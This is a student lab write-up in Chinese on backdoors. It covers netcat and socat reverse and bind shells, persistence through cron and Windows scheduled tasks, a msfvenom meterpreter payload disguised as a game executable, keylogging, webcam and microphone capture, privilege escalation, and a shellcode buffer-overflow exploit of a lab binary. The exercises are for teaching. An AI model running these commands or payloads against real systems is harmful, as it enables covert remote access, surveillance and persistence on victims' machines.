其他分享
首页 > 其他分享> > 2019-2020-2 20175317钟睿文《网络对抗技术》Exp2 后门原理与实践

2019-2020-2 20175317钟睿文《网络对抗技术》Exp2 后门原理与实践

作者:互联网

2019-2020-2 20175317钟睿文《网络对抗技术》Exp2 后门原理与实践

1.1 实践目标

(1)任务一:使用netcat获取主机操作Shell,cron启动

(2)任务二:使用socat获取主机操作Shell, 任务计划启动

(3)任务三:使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(4)任务四:使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(5)任务五:可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell加分内容一并写入本实验报告。

1.2 基础知识

任务一

Windows获得Linux Shell

首先在Windows中使用ipconfig查看其IP地址

输入图片说明

使用ncat.exe程序打开监听ncat.exe -l -p 5317,记得在此之前关闭防火墙

在kali中使用-e选项执行shell程序反弹连接Windows:nc 192.168.0.102 5317 -e /bin/sh

之后就会发现Windows成功获得kali的shell:

输入图片说明

Linux获得Windows Shell

在kali中使用ifconfig查看IP

输入图片说明

使用nc -l -p 5317打开kali的监听
在Windows中使用ncat.exe -e cmd.exe 192.168.0.115 5317反弹连接kali

之后就会发现kali成功获得Windows的命令提示

输入图片说明

启动cron

Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。
Windows系统下监听端口5317,Linux系统下,输入指令crontab -e并选择3进入编辑模式,crontab指令表示增加一条定时任务,-e表示编辑
在最后一行添加33 * * * * /bin/netcat 192.168.0.102 5317 -e /bin/sh,表示每个小时的第33分钟执行后面的那条指令。

输入图片说明

linux在33分钟时连接Windows,这是一个反弹连接式后门,监听的windows连接后可获得shell

输入图片说明

使用nc传输数据

Windows下使用ncat.exe -l 5317监听5317端口,kali使用nc 192.168.0.102 5317反弹连接到Windows的5317端口,连接建立成功后双方可互传数据

输入图片说明

使用nc传输文件

Windows下使用ncat.exe -l 5317 > mess.out监听5317端口,并把收到的数据保存到mess.out中,kali使用nc 192.168.0.102 5317 < mess.in反弹连接到Windows的5317端口,建立成功后,Windows可以收到kali发来的文件

可以在目录下找到mess.out,打开后可以看到内容与mess.in一致

输入图片说明

将文件从Windows传给kali首先要将kali虚拟机的ssh服务端口打开,之后就只需使kali监听5317端口,Windows反弹连接kali的5317端口,建立成功后,kali可以收到Windows发来的文件

任务二

首先下载socat,在老师给的附件里有,下载完成后打开计算机管理,在“任务计划程序”中“创建任务”,填写任务名并新建一个触发器。

输入图片说明

在操作中的程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:5317 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口5317,同时把cmd.exe的stderr重定向到stdout上

输入图片说明

新建一个触发器,选择按预定计划,其他设置自行设定

输入图片说明

注销账户重新登陆后就可以看到任务已经在运行了

输入图片说明

到达触发时间后任务自动运行

输入图片说明

在kali输入指令socat - tcp:192.168.0.102:5317,连接到Windows主机的5317端口,此时可以获得Windows的shell

输入图片说明

任务三

使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
使用kali攻击win10,首先在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.102 LPORT=5317 -f exe > Counter-Strike20175317.exe,注意这里的IP地址为控制端IP,即kali的IP,后门程序为Counter-Strike20175317.exe

输入图片说明

在Windows下执行ncat.exe -lv 5317 > Counter-Strike20175317.exe 指令,查看当前的连接状态

输入图片说明

在kali中使用nc 192.168.0.102 5317 < Counter-Strike20175317.exe传输后门程序,传输成功win10的cmd中会出现传输信息

输入图片说明

在Kali上使用msfconsole指令进入msf控制台

输入图片说明

使用exploit开始监听,运行Windows中的后门程序
在cmd中运行Windows下的后门程序,这时Kali上获得了Windows主机的shell,经测试可以使用

输入图片说明

任务四

使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

获取录音权限

使用record_mic -d 5指令可以截获一段时长5s的音频,录制完毕会告诉你他的保存路径,打开后就可以发现这是来自未知艺术家的5秒音频 ^皿^

输入图片说明

获取摄像头权限

webcam_snap指令可以使用摄像头进行拍照,拍摄完毕桌面会出现一张JPEG图像,我将笔记本的摄像头驱动关掉了,所以拍出来是这样的  ̄︶ ̄

输入图片说明

获取击键记录

keyscan_start指令可以记录下击键的过程,keyscan_dump则用于读取击键记录(我这里按的是Ctrl+C)

输入图片说明

获取截屏

screenshot指令可以进行截屏

输入图片说明

查看用户与提权

getuid指令可以查看当前用户,getsystem指令进行提权操作

输入图片说明

任务五

使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell。
经过参照学长学姐的总结,我在老师提供的Shellcode网站中搜索linux/x86 - Reverse下载了反弹连接的shellcode

之后像实验一一样做好环境配置,使用echo "0" > /proc/sys/kernel/randomize_va_space关闭地址随机化

输入图片说明

使用如下命令使输出重定向>将perl生成的字符串存储到文件input_shellcode中

perl -e 'print "A" x 32;print"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_shellcode

打开一个终端使用(cat input_shellcode;cat) | ./pwn1注入这段攻击buf

再开另外一个终端,用gdb来调试pwn1这个进程。输入ps -ef | grep pwn1找到pwn1的进程号

之后启动gdb使用attach调试这个进程。使用disassemble foo查看到ret的地址

输入图片说明

0xffffd38c存放的数据是80cd01b0,那么shellcode地址就是0xffffd390

修改并生成input文件

perl -e 'print "A" x 32;print"\x90\xd3\xff\xff\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input

打开msf控制台依次输入

`use exploit/multi/handler`,用于设置payload
`set payload linux/x86/shell_reverse_tcp`
`set LHOST 127.0.0.1`,设置IP为回环地址
`set LPORT 4444`,根据代码设置端口
`exploit` ,设置完成开始监听

使用(cat input;cat) | ./pwn1将input输入,通过管道符“|”,作为pwn1的输入。

这时在msf控制台可以看到已经成功调取了shell

输入图片说明

实验中遇到的问题

win10系统升级管理员权限时失败了,经过百度和尝试同学们的方法也都失败了,希望自己在接下来的尝试中可以找到原因
输入图片说明

实验收获与感想

本次实验比较简单,原本以为可以很快完成,但是做到任务五时msf控制台始终不显示下面这行

[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:48928) at 2020-03-10 07:23:28 -0400

导致shell一直不能被调取,经过检查计算shellcode地址的过程也没有问题,经过百度也没有得到解决,导致我从下午4点卡到了6点,结果吃完饭坐下来同样的步骤又试了一遍竟然成功了(╬▔皿▔)……

通过本次实验使我对后门有了更加深刻的认识,能从自己的设备上获取摄像头麦克风和键入信息还是蛮可怕的!

问题回答

参考资料

使用MSF生成shellcode
2018-2019-2 网络对抗技术 20165318 Exp2 后门原理与实践

标签:钟睿文,x31,Windows,Exp2,使用,5317,exe,2020,kali
来源: https://www.cnblogs.com/20175317zrw/p/12456627.html